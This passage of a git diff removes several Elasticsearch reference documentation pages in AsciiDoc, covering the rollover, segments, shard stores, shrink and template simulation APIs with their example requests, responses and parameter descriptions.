"old_index": "logs-000001", - "new_index": "logs-000002", - "rolled_over": true, <1> - "dry_run": false, <2> - "conditions": { <3> - "[max_age: 7d]": false, - "[max_docs: 1000]": true, - "[max_size: 5gb]": false, - } -} --------------------------------------------------- - -<1> Whether the index was rolled over. -<2> Whether the rollover was dry run. -<3> The result of each condition. - - -[[rollover-data-stream-ex]] -===== Roll over a data stream - -[source,console] ------------------------------------ -PUT _index_template/template -{ - "index_patterns": ["my-data-stream*"], - "data_stream": { } -} ------------------------------------ - -[source,console] --------------------------------------------------- -PUT /_data_stream/my-data-stream <1> - -# Add > 1000 documents to my-data-stream - -POST /my-data-stream/_rollover <2> -{ - "conditions" : { - "max_age": "7d", - "max_docs": 1000, - "max_size": "5gb" - } -} --------------------------------------------------- -// TEST[continued] -// TEST[setup:my_index_huge] -// TEST[s/# Add > 1000 documents to my-data-stream/POST _reindex?refresh\n{ "source": { "index": "my-index-000001" }, "dest": { "index": "my-data-stream", "op_type": "create" } }/] -<1> Creates a data stream called `my-data-stream` with one initial backing index -named `my-data-stream-000001`. -<2> This request creates a new backing index, `my-data-stream-000002`, and adds -it as the write index for `my-data-stream` if the current -write index meets at least one of the following conditions: -+ --- -* The index was created 7 or more days ago. -* The index has an index size of 5GB or greater. -* The index contains 1,000 or more documents. --- - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "acknowledged": true, - "shards_acknowledged": true, - "old_index": ".ds-my-data-stream-000001", <1> - "new_index": ".ds-my-data-stream-000002", <2> - "rolled_over": true, <3> - "dry_run": false, <4> - "conditions": { <5> - "[max_age: 7d]": false, - "[max_docs: 1000]": true, - "[max_size: 5gb]": false, - } -} --------------------------------------------------- - -<1> The previous write index for the data stream. -<2> The new write index for the data stream. -<3> Whether the index was rolled over. -<4> Whether the rollover was dry run. -<5> The result of each condition. - -//// -[source,console] ------------------------------------ -DELETE /_data_stream/my-data-stream -DELETE /_index_template/template ------------------------------------ -// TEST[continued] -//// - -[[rollover-index-settings-ex]] -===== Specify settings for the target index - -The settings, mappings, and aliases for the new index are taken from any -matching <>. If the rollover target is an -index alias, you can specify `settings`, `mappings`, and `aliases` in the body -of the request just like the <> API. Values -specified in the request override any values set in matching index templates. -For example, the following `rollover` request overrides the -`index.number_of_shards` setting: - -[source,console] --------------------------------------------------- -PUT /logs-000001 -{ - "aliases": { - "logs_write": {} - } -} - -POST /logs_write/_rollover -{ - "conditions" : { - "max_age": "7d", - "max_docs": 1000, - "max_size": "5gb" - }, - "settings": { - "index.number_of_shards": 2 - } -} --------------------------------------------------- - - -[[rollover-index-specify-index-ex]] -===== Specify a target index name - -If the rollover target is an index alias and the name of the existing index ends -with `-` and a number -- e.g. `logs-000001` -- then the name of the new index -will follow the same pattern, incrementing the number (`logs-000002`). The -number is zero-padded with a length of 6, regardless of the old index name. - -If the old name doesn't match this pattern then you must specify the name for -the new index as follows: - -[source,console] --------------------------------------------------- -POST /my_alias/_rollover/my_new_index_name -{ - "conditions": { - "max_age": "7d", - "max_docs": 1000, - "max_size": "5gb" - } -} --------------------------------------------------- -// TEST[s/^/PUT my_old_index_name\nPUT my_old_index_name\/_alias\/my_alias\n/] - - -[[_using_date_math_with_the_rollover_api]] -===== Use date math with a rollover - -If the rollover target is an index alias, it can be useful to use -<> to name the rollover index according to the -date that the index rolled over, e.g. `logstash-2016.02.03`. The rollover API -supports date math, but requires the index name to end with a dash followed by -a number, e.g. `logstash-2016.02.03-1` which is incremented every time the -index is rolled over. For instance: - -[source,console] --------------------------------------------------- -# PUT / with URI encoding: -PUT /%3Clogs_%7Bnow%2Fd%7D-1%3E <1> -{ - "aliases": { - "logs_write": {} - } -} - -PUT logs_write/_doc/1 -{ - "message": "a dummy log" -} - -POST logs_write/_refresh - -# Wait for a day to pass - -POST /logs_write/_rollover <2> -{ - "conditions": { - "max_docs": "1" - } -} --------------------------------------------------- -// TEST[s/now/2016.10.31%7C%7C/] - -<1> Creates an index named with today's date (e.g.) `logs_2016.10.31-1` -<2> Rolls over to a new index with today's date, e.g. `logs_2016.10.31-000002` if run immediately, or `logs-2016.11.01-000002` if run after 24 hours - -////////////////////////// - -[source,console] --------------------------------------------------- -GET _alias --------------------------------------------------- -// TEST[continued] - -[source,console-result] --------------------------------------------------- -{ - "logs_2016.10.31-000002": { - "aliases": { - "logs_write": {} - } - }, - "logs_2016.10.31-1": { - "aliases": {} - } -} --------------------------------------------------- - -////////////////////////// - -These indices can then be referenced as described in the -<>. For example, to search -over indices created in the last three days, you could do the following: - -[source,console] --------------------------------------------------- -# GET /,,/_search -GET /%3Clogs-%7Bnow%2Fd%7D-*%3E%2C%3Clogs-%7Bnow%2Fd-1d%7D-*%3E%2C%3Clogs-%7Bnow%2Fd-2d%7D-*%3E/_search --------------------------------------------------- -// TEST[continued] -// TEST[s/now/2016.10.31%7C%7C/] - - -[[rollover-index-api-dry-run-ex]] -===== Dry run - -The rollover API supports `dry_run` mode, where request conditions can be -checked without performing the actual rollover. - -[source,console] --------------------------------------------------- -POST /logs_write/_rollover?dry_run -{ - "conditions" : { - "max_age": "7d", - "max_docs": 1000, - "max_size": "5gb" - } -} --------------------------------------------------- -// TEST[s/^/PUT logs-000001\nPUT logs-000001\/_alias\/logs_write\n/] - - -[[indices-rollover-is-write-index]] -===== Roll over a write index - -If the rollover target is an index alias for a write index that has `is_write_index` explicitly set to `true`, it is not -swapped during rollover actions. Since having an alias point to multiple indices is ambiguous in distinguishing -which is the correct write index to roll over, it is not valid to rollover an alias that points to multiple indices. -For this reason, the default behavior is to swap which index is being pointed to by the write-oriented alias. This -was `logs_write` in some of the above examples. Since setting `is_write_index` enables an alias to point to multiple indices -while also being explicit as to which is the write index that rollover should target, removing the alias from the rolled over -index is not necessary. This simplifies things by allowing for one alias to behave both as the write and read aliases for -indices that are being managed with Rollover. - -Look at the behavior of the aliases in the following example where `is_write_index` is set on the rolled over index. - -[source,console] --------------------------------------------------- -PUT my_logs_index-000001 -{ - "aliases": { - "logs": { "is_write_index": true } <1> - } -} - -PUT logs/_doc/1 -{ - "message": "a dummy log" -} - -POST logs/_refresh - -POST /logs/_rollover -{ - "conditions": { - "max_docs": "1" - } -} - -PUT logs/_doc/2 <2> -{ - "message": "a newer log" -} --------------------------------------------------- - -<1> configures `my_logs_index` as the write index for the `logs` alias -<2> newly indexed documents against the `logs` alias will write to the new index - -[source,console-result] --------------------------------------------------- -{ - "_index" : "my_logs_index-000002", - "_type" : "_doc", - "_id" : "2", - "_version" : 1, - "result" : "created", - "_shards" : { - "total" : 2, - "successful" : 1, - "failed" : 0 - }, - "_seq_no" : 0, - "_primary_term" : 1 -} --------------------------------------------------- - -////////////////////////// -[source,console] --------------------------------------------------- -GET my_logs_index-000001,my_logs_index-000002/_alias --------------------------------------------------- -// TEST[continued] -////////////////////////// - -After the rollover, the alias metadata for the two indices will have the `is_write_index` setting -reflect each index's role, with the newly created index as the write index. - -[source,console-result] --------------------------------------------------- -{ - "my_logs_index-000002": { - "aliases": { - "logs": { "is_write_index": true } - } - }, - "my_logs_index-000001": { - "aliases": { - "logs": { "is_write_index" : false } - } - } -} --------------------------------------------------- diff --git a/docs/reference/indices/segments.asciidoc b/docs/reference/indices/segments.asciidoc deleted file mode 100644 index 89bcce73322..00000000000 --- a/docs/reference/indices/segments.asciidoc +++ /dev/null @@ -1,226 +0,0 @@ -[[indices-segments]] -=== Index segments API -++++ -Index segments -++++ - -Returns low-level information about the https://lucene.apache.org/core/[Lucene] -segments in index shards. For data streams, the API returns information about -the stream's backing indices. - -[source,console] ----- -GET /my-index-000001/_segments ----- -// TEST[setup:my_index] - - -[[index-segments-api-request]] -==== {api-request-title} - -`GET //_segments` - -`GET /_segments` - - -[[index-segments-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases used to limit -the request. Wildcard expressions (`*`) are supported. -+ -To target all data streams and indices in a cluster, omit this parameter or use -`_all` or `*`. - - -[[index-segments-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -`verbose`:: -experimental:[] -(Optional, Boolean) -If `true`, the response includes detailed information -about Lucene's memory usage. -Defaults to `false`. - - -[[index-segments-api-response-body]] -==== {api-response-body-title} - -``:: -(String) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=segment] - -`generation`:: -(Integer) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=generation] - -`num_docs`:: -(Integer) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=docs-count] - -`deleted_docs`:: -(Integer) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=docs-deleted] - -`size_in_bytes`:: -(Integer) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=segment-size] - -`memory_in_bytes`:: -(Integer) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=memory] - -`committed`:: -(Boolean) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=committed] - -`search`:: -(Boolean) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=segment-search] - -`version`:: -(String) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=segment-version] - -`compound`:: -(Boolean) -If `true`, Lucene merged all files from the segment -into a single file to save file descriptors. - -`attributes`:: -(Object) -Contains information about whether high compression was enabled. - - -[[index-segments-api-example]] -==== {api-examples-title} - - -===== Get segment information for a specific data stream or index - -[source,console] --------------------------------------------------- -GET /test/_segments --------------------------------------------------- -// TEST[s/^/PUT test\n{"settings":{"number_of_shards":1, "number_of_replicas": 0}}\nPOST test\/test\?refresh\n{"test": "test"}\n/] - - -===== Get segment information for several data streams and indices - -[source,console] --------------------------------------------------- -GET /test1,test2/_segments --------------------------------------------------- -// TEST[s/^/PUT test1\nPUT test2\n/] - - -===== Get segment information for all data streams and indices in a cluster - -[source,console] --------------------------------------------------- -GET /_segments --------------------------------------------------- -// TEST[s/^/PUT test\n{"settings":{"number_of_shards":1, "number_of_replicas": 0}}\nPOST test\/test\?refresh\n{"test": "test"}\n/] - -The API returns the following response: - -[source,console-response] --------------------------------------------------- -{ - "_shards": ... - "indices": { - "test": { - "shards": { - "0": [ - { - "routing": { - "state": "STARTED", - "primary": true, - "node": "zDC_RorJQCao9xf9pg3Fvw" - }, - "num_committed_segments": 0, - "num_search_segments": 1, - "segments": { - "_0": { - "generation": 0, - "num_docs": 1, - "deleted_docs": 0, - "size_in_bytes": 3800, - "memory_in_bytes": 1410, - "committed": false, - "search": true, - "version": "7.0.0", - "compound": true, - "attributes": { - } - } - } - } - ] - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards,/] -// TESTRESPONSE[s/"node": "zDC_RorJQCao9xf9pg3Fvw"/"node": $body.$_path/] -// TESTRESPONSE[s/"attributes": \{[^}]*\}/"attributes": $body.$_path/] -// TESTRESPONSE[s/: (\-)?[0-9]+/: $body.$_path/] -// TESTRESPONSE[s/7\.0\.0/$body.$_path/] - - -===== Verbose mode - -To add additional information that can be used for debugging, -use the `verbose` flag. - -experimental::[] - -[source,console] --------------------------------------------------- -GET /test/_segments?verbose=true --------------------------------------------------- -// TEST[continued] - -The API returns the following response: - -[source,console-response] --------------------------------------------------- -{ - ... - "_0": { - ... - "ram_tree": [ - { - "description": "postings [PerFieldPostings(format=1)]", - "size_in_bytes": 2696, - "children": [ - { - "description": "format 'Lucene50_0' ...", - "size_in_bytes": 2608, - "children" :[ ... ] - }, - ... - ] - }, - ... - ] - - } - ... -} --------------------------------------------------- -// TESTRESPONSE[skip:Response is too verbose to be fully shown in documentation, so we just show the relevant bit and don't test the response.] diff --git a/docs/reference/indices/shard-stores.asciidoc b/docs/reference/indices/shard-stores.asciidoc deleted file mode 100644 index c82cd1e0705..00000000000 --- a/docs/reference/indices/shard-stores.asciidoc +++ /dev/null @@ -1,187 +0,0 @@ -[[indices-shards-stores]] -=== Index shard stores API -++++ -Index shard stores -++++ - -Retrieves store information -about replica shards in one or more indices. -For data streams, the API retrieves store -information for the stream's backing indices. - -[source,console] ----- -GET /my-index-000001/_shard_stores ----- -// TEST[setup:my_index] - - -[[index-shard-stores-api-request]] -==== {api-request-title} - -`GET //_shard_stores` - -`GET /_shard_stores` - - -[[index-shard-stores-api-desc]] -==== {api-description-title} - -The index shard stores API returns the following information: - -* The node on which each replica shard exists -* Allocation ID for each replica shard -* Unique ID for each replica shard -* Any errors encountered - while opening the shard index - or from an earlier failure - -By default, the API only returns store information -for primary shards that are unassigned -or have one or more unassigned replica shards. - - -[[index-shard-stores-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases used to limit -the request. Wildcard expressions (`*`) are supported. -+ -To target all data streams and indices in a cluster, omit this parameter or use -`_all` or `*`. - - -[[index-shard-stores-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -`status`:: -+ --- -(Optional, string) -Comma-separated list of shard health statuses -used to limit the request. - -Valid values include: - -`green`:: -The primary shard and all replica shards are assigned. - -`yellow`:: -One or more replica shards are unassigned. - -`red`:: -The primary shard is unassigned. - -`all`:: -Return all shards, -regardless of health status. - -Defaults to `yellow,red`. --- - -[[index-shard-stores-api-example]] -==== {api-examples-title} - - -[[index-shard-stores-api-single-ex]] -===== Get shard store information for a specific data stream or index - -[source,console] ----- -GET /test/_shard_stores ----- -// TEST[s/^/PUT test\n/] - - -[[index-shard-stores-api-multi-ex]] -===== Get shard store information for several data streams and indices - -[source,console] ----- -GET /test1,test2/_shard_stores ----- -// TEST[s/^/PUT test1\nPUT test2\n/] - - -[[index-shard-stores-api-all-ex]] -===== Get shard store information for all data streams and indices - -[source,console] ----- -GET /_shard_stores ----- -// TEST[continued] - - -[[index-shard-stores-api-health-ex]] -===== Get shard store information based on cluster health - -You can use the `status` query parameter -to limit returned information based on shard health. - -The following request only returns information -for assigned primary and replica shards. - -[source,console] --------------------------------------------------- -GET /_shard_stores?status=green --------------------------------------------------- -// TEST[setup:node] -// TEST[s/^/PUT my-index-00001\n{"settings":{"number_of_shards":1, "number_of_replicas": 0}}\nPOST my-index-00001\/test\?refresh\n{"test": "test"}\n/] - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "indices": { - "my-index-00001": { - "shards": { - "0": { <1> - "stores": [ <2> - { - "sPa3OgxLSYGvQ4oPs-Tajw": { <3> - "name": "node_t0", - "ephemeral_id": "9NlXRFGCT1m8tkvYCMK-8A", - "transport_address": "local[1]", - "attributes": {} - }, - "allocation_id": "2iNySv_OQVePRX-yaRH_lQ", <4> - "allocation": "primary|replica|unused" <5> - "store_exception": ... <6> - } - ] - } - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"store_exception": \.\.\.//] -// TESTRESPONSE[s/"sPa3OgxLSYGvQ4oPs-Tajw"/\$node_name/] -// TESTRESPONSE[s/: "[^"]*"/: $body.$_path/] -// TESTRESPONSE[s/"attributes": \{[^}]*\}/"attributes": $body.$_path/] - - - -<1> The key is the corresponding shard id for the store information -<2> A list of store information for all copies of the shard -<3> The node information that hosts a copy of the store, the key - is the unique node id. -<4> The allocation id of the store copy -<5> The status of the store copy, whether it is used as a - primary, replica or not used at all -<6> Any exception encountered while opening the shard index or - from earlier engine failure diff --git a/docs/reference/indices/shrink-index.asciidoc b/docs/reference/indices/shrink-index.asciidoc deleted file mode 100644 index 5a32a3f1987..00000000000 --- a/docs/reference/indices/shrink-index.asciidoc +++ /dev/null @@ -1,229 +0,0 @@ -[[indices-shrink-index]] -=== Shrink index API -++++ -Shrink index -++++ - -Shrinks an existing index into a new index with fewer primary shards. - - -[source,console] ----- -POST /my-index-000001/_shrink/shrunk-my-index-000001 ----- -// TEST[s/^/PUT my-index-000001\n{"settings":{"index.number_of_shards":2,"blocks.write":true}}\n/] - - -[[shrink-index-api-request]] -==== {api-request-title} - -`POST //_shrink/` - -`PUT //_shrink/` - - -[[shrink-index-api-prereqs]] -==== {api-prereq-title} - -Before you can shrink an index: - -* The index must be read-only. -* All primary shards for the index must reside on the same node. -* The index must have a `green` <>. - -To make shard allocation easier, we recommend you also remove the index's -replica shards. You can later re-add replica shards as part of the shrink -operation. - -You can use the following <> -request to remove an index's replica shards, relocates the index's remaining -shards to the same node, and make the index read-only. - -[source,console] --------------------------------------------------- -PUT /my_source_index/_settings -{ - "settings": { - "index.number_of_replicas": 0, <1> - "index.routing.allocation.require._name": "shrink_node_name", <2> - "index.blocks.write": true <3> - } -} --------------------------------------------------- -// TEST[s/^/PUT my_source_index\n{"settings":{"index.number_of_shards":2}}\n/] - -<1> Removes replica shards for the index. -<2> Relocates the index's shards to the `shrink_node_name` node. - See <>. -<3> Prevents write operations to this index. Metadata changes, such as deleting - the index, are still allowed. - - -It can take a while to relocate the source index. Progress can be tracked -with the <>, or the <> can be used to wait until all shards have relocated -with the `wait_for_no_relocating_shards` parameter. - - -[[shrink-index-api-desc]] -==== {api-description-title} - -The shrink index API allows you to shrink an existing index into a new index -with fewer primary shards. The requested number of primary shards in the target index -must be a factor of the number of shards in the source index. For example an index with -`8` primary shards can be shrunk into `4`, `2` or `1` primary shards or an index -with `15` primary shards can be shrunk into `5`, `3` or `1`. If the number -of shards in the index is a prime number it can only be shrunk into a single -primary shard. Before shrinking, a (primary or replica) copy of every shard -in the index must be present on the same node. - -The current write index on a data stream cannot be shrunk. In order to shrink -the current write index, the data stream must first be -<> so that a new write index is created -and then the previous write index can be shrunk. - -[[how-shrink-works]] -===== How shrinking works - -A shrink operation: - -. Creates a new target index with the same definition as the source - index, but with a smaller number of primary shards. - -. Hard-links segments from the source index into the target index. (If - the file system doesn't support hard-linking, then all segments are copied - into the new index, which is a much more time consuming process. Also if using - multiple data paths, shards on different data paths require a full copy of - segment files if they are not on the same disk since hardlinks don’t work across - disks) - -. Recovers the target index as though it were a closed index which - had just been re-opened. - - -[[_shrinking_an_index]] -===== Shrink an index - -To shrink `my_source_index` into a new index called `my_target_index`, issue -the following request: - -[source,console] --------------------------------------------------- -POST /my_source_index/_shrink/my_target_index -{ - "settings": { - "index.routing.allocation.require._name": null, <1> - "index.blocks.write": null <2> - } -} --------------------------------------------------- -// TEST[continued] - -<1> Clear the allocation requirement copied from the source index. -<2> Clear the index write block copied from the source index. - -The above request returns immediately once the target index has been added to -the cluster state -- it doesn't wait for the shrink operation to start. - -[IMPORTANT] -===================================== - -Indices can only be shrunk if they satisfy the following requirements: - -* The target index must not exist. - -* The source index must have more primary shards than the target index. - -* The number of primary shards in the target index must be a factor of the - number of primary shards in the source index. The source index must have - more primary shards than the target index. - -* The index must not contain more than `2,147,483,519` documents in total - across all shards that will be shrunk into a single shard on the target index - as this is the maximum number of docs that can fit into a single shard. - -* The node handling the shrink process must have sufficient free disk space to - accommodate a second copy of the existing index. - -===================================== - -The `_shrink` API is similar to the <> -and accepts `settings` and `aliases` parameters for the target index: - -[source,console] --------------------------------------------------- -POST /my_source_index/_shrink/my_target_index -{ - "settings": { - "index.number_of_replicas": 1, - "index.number_of_shards": 1, <1> - "index.codec": "best_compression" <2> - }, - "aliases": { - "my_search_indices": {} - } -} --------------------------------------------------- -// TEST[s/^/PUT my_source_index\n{"settings": {"index.number_of_shards":5,"index.blocks.write": true}}\n/] - -<1> The number of shards in the target index. This must be a factor of the - number of shards in the source index. -<2> Best compression will only take affect when new writes are made to the - index, such as when <> the shard to a single - segment. - - -NOTE: Mappings may not be specified in the `_shrink` request. - - -[[monitor-shrink]] -===== Monitor the shrink process - -The shrink process can be monitored with the <>, or the <> can be used to wait -until all primary shards have been allocated by setting the `wait_for_status` -parameter to `yellow`. - -The `_shrink` API returns as soon as the target index has been added to the -cluster state, before any shards have been allocated. At this point, all -shards are in the state `unassigned`. If, for any reason, the target index -can't be allocated on the shrink node, its primary shard will remain -`unassigned` until it can be allocated on that node. - -Once the primary shard is allocated, it moves to state `initializing`, and the -shrink process begins. When the shrink operation completes, the shard will -become `active`. At that point, Elasticsearch will try to allocate any -replicas and may decide to relocate the primary shard to another node. - - -[[shrink-wait-active-shards]] -===== Wait for active shards - -Because the shrink operation creates a new index to shrink the shards to, -the <> setting -on index creation applies to the shrink index action as well. - - -[[shrink-index-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) -Name of the source index to shrink. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=target-index] - -[[shrink-index-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=wait_for_active_shards] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - - -[[shrink-index-api-request-body]] -==== {api-request-body-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=target-index-aliases] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=target-index-settings] diff --git a/docs/reference/indices/simulate-index.asciidoc b/docs/reference/indices/simulate-index.asciidoc deleted file mode 100644 index 2d09117be40..00000000000 --- a/docs/reference/indices/simulate-index.asciidoc +++ /dev/null @@ -1,176 +0,0 @@ -[[indices-simulate-index]] -=== Simulate index API -++++ -Simulate index -++++ - -experimental[] - -Returns the index configuration that would be applied to the specified index from an -existing <>. - -//// -[source,console] --------------------------------------------------- -PUT _index_template/template_1 -{ - "index_patterns": ["my-index-*"], - "template": { - "settings": { - "number_of_shards": 1 - } - } -} --------------------------------------------------- -// TESTSETUP - -[source,console] --------------------------------------------------- -DELETE _index_template/* --------------------------------------------------- -// TEARDOWN -//// - -[source,console] --------------------------------------------------- -POST /_index_template/_simulate_index/my-index-000001 --------------------------------------------------- - -[[simulate-index-api-request]] -==== {api-request-title} - -`POST /_index_template/_simulate_index/` - - -[[simulate-index-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) -Name of the index to simulate. - -[[simulate-index-api-query-params]] -==== {api-query-parms-title} -//// -`cause`:: -(Optional, string) The reason for running the simulation. -//// - -include::{es-ref-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - -[role="child_attributes"] -[[simulate-index-api-response-body]] -==== {api-response-body-title} - -`overlapping`:: -(array) Any templates that also matched the index but were superseded by a higher-priority template. -Response includes an empty array if there are no overlapping templates. -+ -.Properties of `overlapping` -[%collapsible%open] -==== -`name`:: -(string) Name of the superseded template. - -`index_patterns`:: -(array) Index patterns that the superseded template applies to. -==== - -`template`:: -(object) -The settings, mappings, and aliases that would be applied to the index. -+ -.Properties of `template` -[%collapsible%open] -==== -include::{es-ref-dir}/rest-api/common-parms.asciidoc[tag=aliases] -+ -Response includes an empty object if no aliases would be applied. - -include::{es-ref-dir}/rest-api/common-parms.asciidoc[tag=mappings] -+ -Omitted from the response if no mappings would be applied. - -include::{es-ref-dir}/rest-api/common-parms.asciidoc[tag=settings] -+ -Response includes an empty object if no settings would be applied. -==== - -[[simulate-index-api-example]] -==== {api-examples-title} - -The following example shows the configuration that would be applied to `my-index-000001` by -an existing template. - -[source,console] --------------------------------------------------- -PUT /_component_template/ct1 <1> -{ - "template": { - "settings": { - "index.number_of_shards": 2 - } - } -} - -PUT /_component_template/ct2 <2> -{ - "template": { - "settings": { - "index.number_of_replicas": 0 - }, - "mappings": { - "properties": { - "@timestamp": { - "type": "date" - } - } - } - } -} - -PUT /_index_template/final-template <3> -{ - "index_patterns": ["my-index-*"], - "composed_of": ["ct1", "ct2"], - "priority": 5 -} - -POST /_index_template/_simulate_index/my-index-000001 <4> --------------------------------------------------- -<1> Create a component template (`ct1`) that sets the number of shards to 2 -<2> Create a second component template (`ct2`) that sets the number of replicas to 0 and defines a mapping -<3> Create an index template (`final-template`) that uses the component templates -<4> Show the configuration that would be applied to `my-index-000001` - -The response shows the index settings, mappings, and aliases applied by the `final-template`: - -[source,console-result] ---------------------------------------------------------- -{ - "template" : { - "settings" : { - "index" : { - "number_of_shards" : "2", - "number_of_replicas" : "0" - } - }, - "mappings" : { - "properties" : { - "@timestamp" : { - "type" : "date" - } - } - }, - "aliases" : { } - }, - "overlapping" : [ - { - "name" : "template_1", - "index_patterns" : [ - "my-index-*" - ] - } - ] -} ---------------------------------------------------------- diff --git a/docs/reference/indices/simulate-multi-component-templates.asciidoc b/docs/reference/indices/simulate-multi-component-templates.asciidoc deleted file mode 100644 index e3371634caa..00000000000 --- a/docs/reference/indices/simulate-multi-component-templates.asciidoc +++ /dev/null @@ -1,124 +0,0 @@ -[[simulate-multi-component-templates]] -== Simulate multi-component templates - -Since templates can be composed not only of multiple component templates, but also the index -template itself, there are two simulation APIs to determine what the resulting index settings will -be. - -To simulate the settings that would be applied to a particular index name: - -//// -[source,console] --------------------------------------------------- -PUT /_index_template/template_1 -{ - "index_patterns" : ["my*"], - "priority" : 1, - "template": { - "settings" : { - "number_of_shards" : 2 - } - } -} --------------------------------------------------- -// TESTSETUP - -[source,console] --------------------------------------------------- -DELETE /_index_template/template_1 --------------------------------------------------- -// TEARDOWN - -//// - -[source,console] --------------------------------------------------- -POST /_index_template/_simulate_index/my-index-000001 --------------------------------------------------- - -To simulate the settings that would be applied from an existing template: - -[source,console] --------------------------------------------------- -POST /_index_template/_simulate/template_1 --------------------------------------------------- - -You can also specify a template definition in the simulate request. -This enables you to verify that settings will be applied as expected before you add a new template. - -[source,console] --------------------------------------------------- -PUT /_component_template/ct1 -{ - "template": { - "settings": { - "index.number_of_shards": 2 - } - } -} - -PUT /_component_template/ct2 -{ - "template": { - "settings": { - "index.number_of_replicas": 0 - }, - "mappings": { - "properties": { - "@timestamp": { - "type": "date" - } - } - } - } -} - -POST /_index_template/_simulate -{ - "index_patterns": ["my*"], - "template": { - "settings" : { - "index.number_of_shards" : 3 - } - }, - "composed_of": ["ct1", "ct2"] -} --------------------------------------------------- - - -The response shows the settings, mappings, and aliases that would be applied to matching indices, -and any overlapping templates whose configuration would be superseded by the simulated template body -or higher-priority templates. - -[source,console-result] ---------------------------------------------------------- -{ - "template" : { - "settings" : { - "index" : { - "number_of_shards" : "3", <1> - "number_of_replicas" : "0" - } - }, - "mappings" : { - "properties" : { - "@timestamp" : { - "type" : "date" <2> - } - } - }, - "aliases" : { } - }, - "overlapping" : [ - { - "name" : "template_1", <3> - "index_patterns" : [ - "my*" - ] - } - ] -} ---------------------------------------------------------- -<1> The number of shards from the simulated template body -<2> The `@timestamp` field inherited from the `ct2` component template -<3> Any overlapping templates that would have matched, but have lower priority diff --git a/docs/reference/indices/simulate-template.asciidoc b/docs/reference/indices/simulate-template.asciidoc deleted file mode 100644 index 860df49c139..00000000000 --- a/docs/reference/indices/simulate-template.asciidoc +++ /dev/null @@ -1,300 +0,0 @@ -[[indices-simulate-template]] -=== Simulate index template API -++++ -Simulate template -++++ - -experimental[] - -Returns the index configuration that would be applied by a particular -<>. - -//// -[source,console] --------------------------------------------------- -PUT _index_template/template_1 -{ - "index_patterns": ["te*", "bar*"], - "template": { - "settings": { - "number_of_shards": 1 - }, - "mappings": { - "_source": { - "enabled": false - }, - "properties": { - "host_name": { - "type": "keyword" - }, - "created_at": { - "type": "date", - "format": "EEE MMM dd HH:mm:ss Z yyyy" - } - } - }, - "aliases": { - "mydata": { } - } - }, - "priority": 10, - "version": 3, - "_meta": { - "description": "my custom" - } -} --------------------------------------------------- -// TESTSETUP - -[source,console] --------------------------------------------------- -DELETE _index_template/* -DELETE _component_template/* --------------------------------------------------- -// TEARDOWN -//// - -[source,console] --------------------------------------------------- -POST /_index_template/_simulate/template_1 --------------------------------------------------- - -[[simulate-template-api-request]] -==== {api-request-title} - -`POST /_index_template/_simulate/` - - -[[simulate-template-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Name of the index template to simulate. -To test a template configuration before you add it to the cluster, -omit this parameter and specify the template configuration in the request body. - -[[simulate-template-api-query-params]] -==== {api-query-parms-title} -//// -`cause`:: -(Optional, string) The reason for using the specified template for the simulation. -//// - -`create`:: -(Optional, Boolean) If `true`, the template passed in the body is -only used if no existing templates match the same index patterns. -If `false`, the simulation uses the template with the highest priority. -Note that the template is not permanently added or updated in either case; -it is only used for the simulation. -Defaults to `false`. - -include::{es-ref-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - -[[simulate-template-api-request-body]] -==== {api-request-body-title} - -`composed_of`:: -(Optional, array of strings) -Ordered list of component template names. Component templates are merged in the order -specified, meaning that the last component template specified has the highest precedence. -For an example, see -<>. - -`index_patterns`:: -(Required, array of strings) -Array of wildcard (`*`) expressions -used to match the names of indices during creation. - -`priority`:: -(Optional, integer) -Priority that determines what template is applied if there are multiple templates -that match the name of a new index. -The highest priority template takes precedence. Defaults to `0` (lowest priority). - -`template`:: -(Optional, object) -Template to apply. -+ -.Properties of `template` -[%collapsible%open] -==== -include::{es-ref-dir}/rest-api/common-parms.asciidoc[tag=aliases] - -include::{es-ref-dir}/rest-api/common-parms.asciidoc[tag=mappings] - -include::{es-ref-dir}/rest-api/common-parms.asciidoc[tag=settings] -==== - -`version`:: -(Optional, integer) -Version number used to manage index templates externally. -This version is not automatically generated by {es}. - -`_meta`:: -(Optional, object) -User-specified metadata for the index template. -This information is not generated or used by {es}. - -[role="child_attributes"] -[[simulate-template-api-response-body]] -==== {api-response-body-title} - -`overlapping`:: -(array) Any templates that were superseded by the specified template. -+ -.Properties of `overlapping` 